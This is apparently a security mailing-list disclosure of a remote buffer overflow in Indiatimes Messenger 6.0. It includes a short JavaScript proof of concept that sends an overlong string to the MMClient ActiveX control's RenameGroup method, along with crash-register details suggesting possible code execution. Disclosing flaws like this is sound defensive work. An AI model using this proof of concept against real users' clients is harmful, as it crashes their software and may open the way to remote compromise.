Indiatimes Messenger 6.0 Buffer Overflow (Remote)

Vulnerable Program : Indiatimes Messenger v6.0
(Latest)

Vendor URL : http://messenger.indiatimes.com/
(Attempt to contact thru
http://messenger.indiatimes.com/feedback.htm failed!)

Exploit Type : Remote DoS (Remote Compromise may also
be possible)

Discovered by : Gregory R. Panakkal

Proof Of Concept:

[script]
var obj1 = new
ActiveXObject("MMClient.MunduMessenger.1");
var buf = "";

for(i=0; i<1000; i++)
{
  buf += "A";
}

while(obj1.GetServerStatus() != "Logged In"); //wait
till login

obj1.RenameGroup("Friends", buf, 5);
[/script]


The program (MMClient.exe) crashes @ 
004B681B   8979 04          mov dword ptr
ds:[ecx+4],edi
with registers ecx, and edi = 0x41414141
[controllable]

So, remote compromise maybe possible (not confirmed).

rgds,
Gregory R. Panakkal
http://www.infogreg.com



	

	
		
__________________________________________________________ 
Yahoo! India Matrimony: Find your partner online. Go to http://yahoo.shaadi.com